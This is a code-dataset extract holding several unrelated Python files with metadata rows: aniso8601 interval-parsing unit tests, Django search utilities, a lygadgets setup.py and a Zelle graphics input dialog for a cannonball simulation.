self._mylist = [value + stride * i for i in range(count)]
def something(self, val):
return "In Test2 with %s" % val
def __iter__(self):
self._pos = 0
return self
def __next__(self):
if self._pos < len(self._mylist):
self._pos += 1
return self._mylist[self._pos - 1]
raise StopIteration
class TestClass3(object):
def __init__(self):
print("I am Class3")
def thirdfunction(self, val):
print("Got value: %s" % val)
# raise AttributeError("Some weird error")
def raiseSomething(self):
raise SomeException("Something went wrong")
def __hidden(self, name, value):
setattr(self, name, value)
def weird_indirection(self, name):
return functools.partial(self.__hidden, name)
def test_func(*args, **kwargs):
return "In test func"
test_value = 1
| 20.376238
| 65
| 0.623907
| 1,949
| 0.947036
| 0
| 0
| 419
| 0.203596
| 0
| 0
| 183
| 0.088921
|
420d3d5356dc0a6fa2f8ece54ea58e9f77d14058
| 38,124
|
py
|
Python
|
venv/Lib/site-packages/aniso8601/tests/test_interval.py
|
GabrielSilva2y3d/api_atividade-sqlalchemy
|
4a06e37fcb733d4185daf1de6bce415b4de28444
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/aniso8601/tests/test_interval.py
|
GabrielSilva2y3d/api_atividade-sqlalchemy
|
4a06e37fcb733d4185daf1de6bce415b4de28444
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/aniso8601/tests/test_interval.py
|
GabrielSilva2y3d/api_atividade-sqlalchemy
|
4a06e37fcb733d4185daf1de6bce415b4de28444
|
[
"MIT"
] | 1
|
2022-01-13T10:05:55.000Z
|
2022-01-13T10:05:55.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2019, Brandon Nielsen
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
import unittest
import aniso8601
from aniso8601.exceptions import ISOFormatError
from aniso8601.interval import (_parse_interval, parse_interval,
parse_repeating_interval)
from aniso8601.tests.compat import mock
class TestIntervalParserFunctions(unittest.TestCase):
def test_parse_interval(self):
testtuples = (('P1M/1981-04-05T01:01:00',
{'end': (('1981', '04', '05', None, None, None, 'date'),
('01', '01', '00', None, 'time'), 'datetime'),
'duration': (None, '1', None, None, None, None, None,
'duration')}),
('P1M/1981-04-05',
{'end': ('1981', '04', '05', None, None, None, 'date'),
'duration': (None, '1', None, None, None, None, None,
'duration')}),
('P1.5Y/2018-03-06',
{'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': ('1.5', None, None, None, None, None, None,
'duration')}),
('PT1H/2014-11-12',
{'end': ('2014', '11', '12', None, None, None, 'date'),
'duration': (None, None, None, None, '1', None, None,
'duration')}),
('PT4H54M6.5S/2014-11-12',
{'end': ('2014', '11', '12', None, None, None, 'date'),
'duration': (None, None, None, None, '4', '54', '6.5',
'duration')}),
('PT10H/2050-03-01T13:00:00Z',
{'end': (('2050', '03', '01',
None, None, None, 'date'),
('13', '00', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime'),
'duration': (None, None, None,
None, '10', None, None, 'duration')}),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
('PT0.0000001S/2018-03-06',
{'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'0.0000001', 'duration')}),
('PT2.0000048S/2018-03-06',
{'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'2.0000048', 'duration')}),
('1981-04-05T01:01:00/P1M1DT1M',
{'start': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'duration': (None, '1', None,
'1', None, '1', None, 'duration')}),
('1981-04-05/P1M1D',
{'start': ('1981', '04', '05',
None, None, None, 'date'),
'duration': (None, '1', None,
'1', None, None, None, 'duration')}),
('2018-03-06/P2.5M',
{'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, '2.5', None,
None, None, None, None, 'duration')}),
('2014-11-12/PT1H',
{'start': ('2014', '11', '12',
None, None, None, 'date'),
'duration': (None, None, None,
None, '1', None, None, 'duration')}),
('2014-11-12/PT4H54M6.5S',
{'start': ('2014', '11', '12',
None, None, None, 'date'),
'duration': (None, None, None,
None, '4', '54', '6.5', 'duration')}),
('2050-03-01T13:00:00Z/PT10H',
{'start': (('2050', '03', '01',
None, None, None, 'date'),
('13', '00', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime'),
'duration': (None, None, None,
None, '10', None, None, 'duration')}),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
('2018-03-06/PT0.0000001S',
{'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'0.0000001', 'duration')}),
('2018-03-06/PT2.0000048S',
{'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'2.0000048', 'duration')}),
('1980-03-05T01:01:00/1981-04-05T01:01:00',
{'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime')}),
('1980-03-05T01:01:00/1981-04-05',
{'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
'end': ('1981', '04', '05',
None, None, None, 'date')}),
('1980-03-05/1981-04-05T01:01:00',
{'start': ('1980', '03', '05',
None, None, None, 'date'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime')}),
('1980-03-05/1981-04-05',
{'start': ('1980', '03', '05',
None, None, None, 'date'),
'end': ('1981', '04', '05',
None, None, None, 'date')}),
('1981-04-05/1980-03-05',
{'start': ('1981', '04', '05',
None, None, None, 'date'),
'end': ('1980', '03', '05',
None, None, None, 'date')}),
('2050-03-01T13:00:00Z/2050-05-11T15:30:00Z',
{'start': (('2050', '03', '01',
None, None, None, 'date'),
('13', '00', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime'),
'end': (('2050', '05', '11',
None, None, None, 'date'),
('15', '30', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime')}),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
('1980-03-05T01:01:00.0000001/'
'1981-04-05T14:43:59.9999997',
{'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00.0000001',
None, 'time'), 'datetime'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('14', '43', '59.9999997', None, 'time'),
'datetime')}))
for testtuple in testtuples:
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_interval') as mockBuildInterval:
mockBuildInterval.return_value = testtuple[1]
result = parse_interval(testtuple[0])
self.assertEqual(result, testtuple[1])
mockBuildInterval.assert_called_once_with(**testtuple[1])
#Test different separators
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_interval') as mockBuildInterval:
expectedargs = {'start': (('1980', '03', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'end':(('1981', '04', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime')}
mockBuildInterval.return_value = expectedargs
result = parse_interval('1980-03-05T01:01:00--1981-04-05T01:01:00',
intervaldelimiter='--')
self.assertEqual(result, expectedargs)
mockBuildInterval.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_interval') as mockBuildInterval:
expectedargs = {'start': (('1980', '03', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'end':(('1981', '04', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime')}
mockBuildInterval.return_value = expectedargs
result = parse_interval('1980-03-05 01:01:00/1981-04-05 01:01:00',
datetimedelimiter=' ')
self.assertEqual(result, expectedargs)
mockBuildInterval.assert_called_once_with(**expectedargs)
def test_parse_interval_mockbuilder(self):
mockBuilder = mock.Mock()
expectedargs = {'end': (('1981', '04', '05', None, None, None, 'date'),
('01', '01', '00', None, 'time'), 'datetime'),
'duration':(None, '1', None, None, None, None, None,
'duration')}
mockBuilder.build_interval.return_value = expectedargs
result = parse_interval('P1M/1981-04-05T01:01:00', builder=mockBuilder)
self.assertEqual(result, expectedargs)
mockBuilder.build_interval.assert_called_once_with(**expectedargs)
mockBuilder = mock.Mock()
expectedargs = {'start': ('2014', '11', '12', None, None, None,
'date'),
'duration': (None, None, None, None, '1', None, None,
'duration')}
mockBuilder.build_interval.return_value = expectedargs
result = parse_interval('2014-11-12/PT1H', builder=mockBuilder)
self.assertEqual(result, expectedargs)
mockBuilder.build_interval.assert_called_once_with(**expectedargs)
mockBuilder = mock.Mock()
expectedargs = {'start': (('1980', '03', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'end': (('1981', '04', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime')}
mockBuilder.build_interval.return_value = expectedargs
result = parse_interval('1980-03-05T01:01:00/1981-04-05T01:01:00',
builder=mockBuilder)
self.assertEqual(result, expectedargs)
mockBuilder.build_interval.assert_called_once_with(**expectedargs)
def test_parse_interval_relative(self):
with mock.patch.object(aniso8601.builder.RelativeTimeBuilder,
'build_interval') as mockBuildInterval:
expectedargs = {'end': (('1981', '04', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'duration': (None, '1', None, None, None, None,
None, 'duration')}
mockBuildInterval.return_value = expectedargs
result = parse_interval('P1M/1981-04-05T01:01:00', relative=True)
self.assertEqual(result, expectedargs)
mockBuildInterval.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.RelativeTimeBuilder,
'build_interval') as mockBuildInterval:
expectedargs = {'start': ('2014', '11', '12', None, None, None,
'date'),
'duration': (None, None, None, None, '1', None,
None, 'duration')}
mockBuildInterval.return_value = expectedargs
result = parse_interval('2014-11-12/PT1H', relative=True)
self.assertEqual(result, expectedargs)
mockBuildInterval.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.RelativeTimeBuilder,
'build_interval') as mockBuildInterval:
expectedargs = {'start': (('1980', '03', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'end': (('1981', '04', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime')}
mockBuildInterval.return_value = expectedargs
result = parse_interval('1980-03-05T01:01:00/1981-04-05T01:01:00',
relative=True)
self.assertEqual(result, expectedargs)
mockBuildInterval.assert_called_once_with(**expectedargs)
def test_parse_interval_repeating(self):
#Parse interval can't parse repeating intervals
with self.assertRaises(ISOFormatError):
parse_interval('R3/1981-04-05/P1D')
with self.assertRaises(ISOFormatError):
parse_interval('R3/1981-04-05/P0003-06-04T12:30:05.5')
with self.assertRaises(ISOFormatError):
parse_interval('R/PT1H2M/1980-03-05T01:01:00')
def test_parse_interval_suffixgarbage(self):
#Don't allow garbage after the duration
#https://bitbucket.org/nielsenb/aniso8601/issues/9/durations-with-trailing-garbage-are-parsed
with self.assertRaises(ValueError):
parse_interval('2001/P1Dasdf', builder=None)
with self.assertRaises(ValueError):
parse_interval('P1Dasdf/2001', builder=None)
with self.assertRaises(ValueError):
parse_interval('2001/P0003-06-04T12:30:05.5asdfasdf', builder=None)
with self.assertRaises(ValueError):
parse_interval('P0003-06-04T12:30:05.5asdfasdf/2001', builder=None)
class TestRepeatingIntervalParserFunctions(unittest.TestCase):
def test_parse_repeating_interval(self):
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_repeating_interval') as mockBuilder:
expectedargs = {'R': False, 'Rnn': '3',
'interval': (('1981', '04', '05', None, None, None,
'date'),
None,
(None, None, None, '1', None, None,
None, 'duration'),
'interval')}
mockBuilder.return_value = expectedargs
result = parse_repeating_interval('R3/1981-04-05/P1D')
self.assertEqual(result, expectedargs)
mockBuilder.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_repeating_interval') as mockBuilder:
expectedargs = {'R': False, 'Rnn': '11',
'interval': (None,
(('1980', '03', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(None, None, None, None, '1', '2',
None, 'duration'),
'interval')}
mockBuilder.return_value = expectedargs
result = parse_repeating_interval('R11/PT1H2M/1980-03-05T01:01:00')
self.assertEqual(result, expectedargs)
mockBuilder.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_repeating_interval') as mockBuilder:
expectedargs = {'R': False, 'Rnn': '2',
'interval': ((('1980', '03', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(('1981', '04', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
None,
'interval')}
mockBuilder.return_value = expectedargs
result = parse_repeating_interval('R2--1980-03-05T01:01:00--'
'1981-04-05T01:01:00',
intervaldelimiter='--')
self.assertEqual(result, expectedargs)
mockBuilder.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_repeating_interval') as mockBuilder:
expectedargs = {'R': False, 'Rnn': '2',
'interval': ((('1980', '03', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(('1981', '04', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
None,
'interval')}
mockBuilder.return_value = expectedargs
result = parse_repeating_interval('R2/'
'1980-03-05 01:01:00/'
'1981-04-05 01:01:00',
datetimedelimiter=' ')
self.assertEqual(result, expectedargs)
mockBuilder.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_repeating_interval') as mockBuilder:
expectedargs = {'R': True, 'Rnn': None,
'interval': (None,
(('1980', '03', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(None, None, None, None, '1', '2',
None, 'duration'),
'interval')}
mockBuilder.return_value = expectedargs
result = parse_repeating_interval('R/PT1H2M/1980-03-05T01:01:00')
self.assertEqual(result, expectedargs)
mockBuilder.assert_called_once_with(**expectedargs)
def test_parse_repeating_interval_mockbuilder(self):
mockBuilder = mock.Mock()
args = {'R': False, 'Rnn': '3',
'interval': (('1981', '04', '05', None, None, None,
'date'),
None,
(None, None, None, '1', None, None,
None, 'duration'),
'interval')}
mockBuilder.build_repeating_interval.return_value = args
result = parse_repeating_interval('R3/1981-04-05/P1D',
builder=mockBuilder)
self.assertEqual(result, args)
mockBuilder.build_repeating_interval.assert_called_once_with(**args)
mockBuilder = mock.Mock()
args = {'R': False, 'Rnn': '11',
'interval': (None,
(('1980', '03', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(None, None, None, None, '1', '2',
None, 'duration'),
'interval')}
mockBuilder.build_repeating_interval.return_value = args
result = parse_repeating_interval('R11/PT1H2M/1980-03-05T01:01:00',
builder=mockBuilder)
self.assertEqual(result, args)
mockBuilder.build_repeating_interval.assert_called_once_with(**args)
mockBuilder = mock.Mock()
args = {'R': True, 'Rnn': None,
'interval': (None,
(('1980', '03', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(None, None, None, None, '1', '2',
None, 'duration'),
'interval')}
mockBuilder.build_repeating_interval.return_value = args
result = parse_repeating_interval('R/PT1H2M/1980-03-05T01:01:00',
builder=mockBuilder)
self.assertEqual(result, args)
mockBuilder.build_repeating_interval.assert_called_once_with(**args)
def test_parse_repeating_interval_relative(self):
with mock.patch.object(aniso8601.builder.RelativeTimeBuilder,
'build_repeating_interval') as mockBuild:
expectedargs = {'R': False, 'Rnn': '3',
'interval': (('1981', '04', '05', None, None, None,
'date'),
None,
(None, None, None, '1', None, None,
None, 'duration'),
'interval')}
mockBuild.return_value = expectedargs
result = parse_repeating_interval('R3/1981-04-05/P1D', relative=True)
self.assertEqual(result, expectedargs)
mockBuild.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.RelativeTimeBuilder,
'build_repeating_interval') as mockBuild:
expectedargs = {'R': False, 'Rnn': '11',
'interval': (None,
(('1980', '03', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(None, None, None, None, '1', '2',
None, 'duration'),
'interval')}
mockBuild.return_value = expectedargs
result = parse_repeating_interval('R11/'
'PT1H2M/'
'1980-03-05T01:01:00',
relative=True)
self.assertEqual(result, expectedargs)
mockBuild.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.RelativeTimeBuilder,
'build_repeating_interval') as mockBuild:
expectedargs = {'R': True, 'Rnn': None,
'interval': (None,
(('1980', '03', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(None, None, None, None, '1', '2',
None, 'duration'),
'interval')}
mockBuild.return_value = expectedargs
result = parse_repeating_interval('R/'
'PT1H2M/'
'1980-03-05T01:01:00',
relative=True)
self.assertEqual(result, expectedargs)
mockBuild.assert_called_once_with(**expectedargs)
def test_parse_repeating_interval_suffixgarbage(self):
#Don't allow garbage after the duration
#https://bitbucket.org/nielsenb/aniso8601/issues/9/durations-with-trailing-garbage-are-parsed
with self.assertRaises(ISOFormatError):
parse_repeating_interval('R3/1981-04-05/P1Dasdf', builder=None)
with self.assertRaises(ISOFormatError):
parse_repeating_interval('R3/'
'1981-04-05/'
'P0003-06-04T12:30:05.5asdfasdf',
builder=None)
def test_parse_interval_internal(self):
#Test the internal _parse_interval function
testtuples = (('P1M/1981-04-05T01:01:00',
{'end': (('1981', '04', '05', None, None, None, 'date'),
('01', '01', '00', None, 'time'), 'datetime'),
'duration': (None, '1', None, None, None, None, None,
'duration')}),
('P1M/1981-04-05',
{'end': ('1981', '04', '05', None, None, None, 'date'),
'duration': (None, '1', None, None, None, None, None,
'duration')}),
('P1.5Y/2018-03-06',
{'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': ('1.5', None, None, None, None, None, None,
'duration')}),
('PT1H/2014-11-12',
{'end': ('2014', '11', '12', None, None, None, 'date'),
'duration': (None, None, None, None, '1', None, None,
'duration')}),
('PT4H54M6.5S/2014-11-12',
{'end': ('2014', '11', '12', None, None, None, 'date'),
'duration': (None, None, None, None, '4', '54', '6.5',
'duration')}),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
('PT0.0000001S/2018-03-06',
{'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'0.0000001', 'duration')}),
('PT2.0000048S/2018-03-06',
{'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'2.0000048', 'duration')}),
('1981-04-05T01:01:00/P1M1DT1M',
{'start': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'duration': (None, '1', None,
'1', None, '1', None, 'duration')}),
('1981-04-05/P1M1D',
{'start': ('1981', '04', '05',
None, None, None, 'date'),
'duration': (None, '1', None,
'1', None, None, None, 'duration')}),
('2018-03-06/P2.5M',
{'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, '2.5', None,
None, None, None, None, 'duration')}),
('2014-11-12/PT1H',
{'start': ('2014', '11', '12',
None, None, None, 'date'),
'duration': (None, None, None,
None, '1', None, None, 'duration')}),
('2014-11-12/PT4H54M6.5S',
{'start': ('2014', '11', '12',
None, None, None, 'date'),
'duration': (None, None, None,
None, '4', '54', '6.5', 'duration')}),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
('2018-03-06/PT0.0000001S',
{'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'0.0000001', 'duration')}),
('2018-03-06/PT2.0000048S',
{'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'2.0000048', 'duration')}),
('1980-03-05T01:01:00/1981-04-05T01:01:00',
{'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime')}),
('1980-03-05T01:01:00/1981-04-05',
{'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
'end': ('1981', '04', '05',
None, None, None, 'date')}),
('1980-03-05/1981-04-05T01:01:00',
{'start': ('1980', '03', '05',
None, None, None, 'date'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime')}),
('1980-03-05/1981-04-05',
{'start': ('1980', '03', '05',
None, None, None, 'date'),
'end': ('1981', '04', '05',
None, None, None, 'date')}),
('1981-04-05/1980-03-05',
{'start': ('1981', '04', '05',
None, None, None, 'date'),
'end': ('1980', '03', '05',
None, None, None, 'date')}),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
('1980-03-05T01:01:00.0000001/'
'1981-04-05T14:43:59.9999997',
{'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00.0000001',
None, 'time'), 'datetime'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('14', '43', '59.9999997', None, 'time'),
'datetime')}))
for testtuple in testtuples:
mockBuilder = mock.Mock()
mockBuilder.build_interval.return_value = testtuple[1]
result = _parse_interval(testtuple[0], mockBuilder)
self.assertEqual(result, testtuple[1])
mockBuilder.build_interval.assert_called_once_with(**testtuple[1])
#Test different separators
expectedargs = {'start': (('1980', '03', '05',
None, None, None,
'date'),
('01', '01', '00',
None, 'time'),
'datetime'),
'end': (('1981', '04', '05',
None, None, None,
'date'),
('01', '01', '00',
None, 'time'),
'datetime')}
mockBuilder = mock.Mock()
mockBuilder.build_interval.return_value = expectedargs
result = _parse_interval('1980-03-05T01:01:00--1981-04-05T01:01:00',
mockBuilder,
intervaldelimiter='--')
self.assertEqual(result, expectedargs)
mockBuilder.build_interval.assert_called_once_with(**expectedargs)
expectedargs = {'start': (('1980', '03', '05',
None, None, None,
'date'),
('01', '01', '00',
None, 'time'),
'datetime'),
'end': (('1981', '04', '05',
None, None, None,
'date'),
('01', '01', '00',
None, 'time'),
'datetime')}
mockBuilder = mock.Mock()
mockBuilder.build_interval.return_value = expectedargs
_parse_interval('1980-03-05 01:01:00/1981-04-05 01:01:00',
mockBuilder,
datetimedelimiter=' ')
self.assertEqual(result, expectedargs)
mockBuilder.build_interval.assert_called_once_with(**expectedargs)
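# Hedged usage sketch (not part of the test module): with the real
# PythonTimeBuilder (no mocks), parse_interval on a <start>/<end> string is
# expected to return the two parsed endpoints as a tuple.
if __name__ == '__main__':
    start, end = aniso8601.parse_interval('1980-03-05T01:01:00/1981-04-05T01:01:00')
    print(start, end)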
| 50.629482
| 115
| 0.387027
| 37,665
| 0.98796
| 0
| 0
| 0
| 0
| 0
| 0
| 8,591
| 0.225344
|
420d64c40f09249f80d51908d10b8e6dab472942
| 3,008
|
py
|
Python
|
cool/core/utils.py
|
007gzs/django-cool
|
3b4ed1a8ca020e6f798ca47e20169e5a854b4f24
|
[
"BSD-3-Clause"
] | 11
|
2020-05-19T09:52:35.000Z
|
2022-02-25T10:39:56.000Z
|
cool/core/utils.py
|
007gzs/django-cool
|
3b4ed1a8ca020e6f798ca47e20169e5a854b4f24
|
[
"BSD-3-Clause"
] | null | null | null |
cool/core/utils.py
|
007gzs/django-cool
|
3b4ed1a8ca020e6f798ca47e20169e5a854b4f24
|
[
"BSD-3-Clause"
] | 1
|
2020-12-24T08:14:58.000Z
|
2020-12-24T08:14:58.000Z
|
# encoding: utf-8
import operator
from functools import reduce
from django.core.exceptions import FieldDoesNotExist
from django.db.models import Q
from django.db.models.constants import LOOKUP_SEP
def split_camel_name(name, fall=False):
"""
    Split a camel-case name into words
GenerateURLs => [Generate, URLs]
generateURLsLite => [generate, URLs, Lite]
"""
if not name:
return []
lastest_upper = name[0].isupper()
idx_list = []
for idx, char in enumerate(name):
upper = char.isupper()
# rising
if upper and not lastest_upper:
idx_list.append(idx)
# falling
elif fall and not upper and lastest_upper:
idx_list.append(idx-1)
lastest_upper = upper
l_idx = 0
name_items = []
for r_idx in idx_list:
if name[l_idx:r_idx]:
name_items.append(name[l_idx:r_idx])
l_idx = r_idx
if name[l_idx:]:
name_items.append(name[l_idx:])
return name_items
def construct_search(queryset, field_name):
"""
    Build the search lookup for a field name
"""
if field_name.startswith('^'):
return "%s__istartswith" % field_name[1:]
elif field_name.startswith('='):
return "%s__iexact" % field_name[1:]
# Use field_name if it includes a lookup.
opts = queryset.model._meta
lookup_fields = field_name.split(LOOKUP_SEP)
# Go through the fields, following all relations.
prev_field = None
for path_part in lookup_fields:
if path_part == 'pk':
path_part = opts.pk.name
try:
field = opts.get_field(path_part)
except FieldDoesNotExist:
# Use valid query lookups.
if prev_field and prev_field.get_lookup(path_part):
return field_name
else:
prev_field = field
if hasattr(field, 'get_path_info'):
# Update opts to follow the relation.
opts = field.get_path_info()[-1].to_opts
# Otherwise, use the field with icontains.
return "%s__icontains" % field_name
def get_search_results(queryset, search_term, search_fields, model):
"""
Return a tuple containing a queryset to implement the search
and a boolean indicating if the results may contain duplicates.
"""
try:
from django.contrib.admin.utils import (
lookup_needs_distinct as lookup_spawns_duplicates,
)
except ImportError:
from django.contrib.admin.utils import lookup_spawns_duplicates
use_distinct = False
if search_fields and search_term:
orm_lookups = [construct_search(queryset, str(search_field)) for search_field in search_fields]
for bit in search_term.split():
or_queries = [Q(**{orm_lookup: bit}) for orm_lookup in orm_lookups]
queryset = queryset.filter(reduce(operator.or_, or_queries))
use_distinct |= any(lookup_spawns_duplicates(model._meta, search_spec) for search_spec in orm_lookups)
return queryset, use_distinct
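# Small illustrative check (a sketch, not part of the original module):
# split_camel_name splits on rising case transitions by default, and also on
# falling transitions when fall=True.
if __name__ == '__main__':
    print(split_camel_name('GenerateURLs'))      # ['Generate', 'URLs']
    print(split_camel_name('generateURLsLite'))  # ['generate', 'URLs', 'Lite']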
| 31.663158
| 110
| 0.648936
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 607
| 0.199671
|
420dab6ca09e09f7cbafe716ac539156b5dcaa62
| 773
|
py
|
Python
|
setup.py
|
atait/klayout-gadgets
|
a8d9655e547fc4531982bbe55e632009bad39096
|
[
"MIT"
] | 13
|
2018-12-02T23:32:29.000Z
|
2022-02-11T19:28:49.000Z
|
setup.py
|
atait/klayout-gadgets
|
a8d9655e547fc4531982bbe55e632009bad39096
|
[
"MIT"
] | 3
|
2019-01-15T23:59:59.000Z
|
2020-12-04T16:30:48.000Z
|
setup.py
|
atait/klayout-gadgets
|
a8d9655e547fc4531982bbe55e632009bad39096
|
[
"MIT"
] | 1
|
2020-12-01T22:56:03.000Z
|
2020-12-01T22:56:03.000Z
|
from setuptools import setup
def readme():
with open('README.md', 'r') as fx:
return fx.read()
setup(name='lygadgets',
version='0.1.31',
description='Tools to make klayout, the standalone, and python environments work better together',
long_description=readme(),
long_description_content_type='text/markdown',
author='Alex Tait',
author_email='alexander.tait@nist.gov',
license='MIT',
packages=['lygadgets'],
install_requires=['future', 'xmltodict'],
package_data={'': ['*.lym']},
include_package_data=True,
entry_points={'console_scripts': [
'lygadgets_link=lygadgets.command_line:cm_link_any',
'lygadgets_unlink=lygadgets.command_line:cm_unlink_any',
]},
)
| 29.730769
| 104
| 0.654592
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 336
| 0.43467
|
420db9bdde8897b05f3ac2a8bb469ed44754dbb4
| 1,748
|
py
|
Python
|
Python/Zelle/Chapter10_DefiningClasses/ProgrammingExercises/16_CannonballTarget/inputDialog.py
|
jeffvswanson/CodingPractice
|
9ea8e0dd504230cea0e8684b31ef22c3ed90d2fb
|
[
"MIT"
] | null | null | null |
Python/Zelle/Chapter10_DefiningClasses/ProgrammingExercises/16_CannonballTarget/inputDialog.py
|
jeffvswanson/CodingPractice
|
9ea8e0dd504230cea0e8684b31ef22c3ed90d2fb
|
[
"MIT"
] | null | null | null |
Python/Zelle/Chapter10_DefiningClasses/ProgrammingExercises/16_CannonballTarget/inputDialog.py
|
jeffvswanson/CodingPractice
|
9ea8e0dd504230cea0e8684b31ef22c3ed90d2fb
|
[
"MIT"
] | null | null | null |
# inputDialog.py
""" Provides a window to get input values
from the user to animate a cannonball."""
from graphics import GraphWin, Entry, Text, Point
from button import Button
class InputDialog:
""" A custom window for getting simulation values (angle, velocity,
and height) from the user."""
def __init__(self, angle, vel, height):
""" Build and display the ingut window """
self.win = win = GraphWin("Initial Values", 200, 300)
win.setCoords(0, 4.5, 4, 0.5)
Text(Point(1, 1), "Angle").draw(win)
self.angle = Entry(Point(3, 1), 5).draw(win)
self.angle.setText(str(angle))
Text(Point(1, 2), "Velocity").draw(win)
self.vel = Entry(Point(3, 2), 5).draw(win)
self.vel.setText(str(vel))
Text(Point(1, 3), "Height").draw(win)
self.height = Entry(Point(3, 3), 5).draw(win)
self.height.setText(str(height))
self.fire = Button(win, Point(1, 4), 1.25, 0.5, "Fire!")
self.fire.activate()
self.quit = Button(win, Point(3, 4), 1.25, 0.5, "Quit")
self.quit.activate()
def interact(self):
""" wait for user to click Quit or Fire button
Returns a string indicating which button was clicked
"""
while True:
pt = self.win.getMouse()
if self.quit.clicked(pt):
return "Quit"
if self.fire.clicked(pt):
return "Fire!"
def getValues(self):
""" return input values """
a = float(self.angle.getText())
v = float(self.vel.getText())
h = float(self.height.getText())
return a, v, h
def close(self):
""" close the input window """
self.win.close()
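# Minimal usage sketch (an assumption, not part of the original module): the
# typical flow is to show the dialog, wait for a button press, read the values
# back, and close the window.
if __name__ == "__main__":
    dialog = InputDialog(45, 40, 2)
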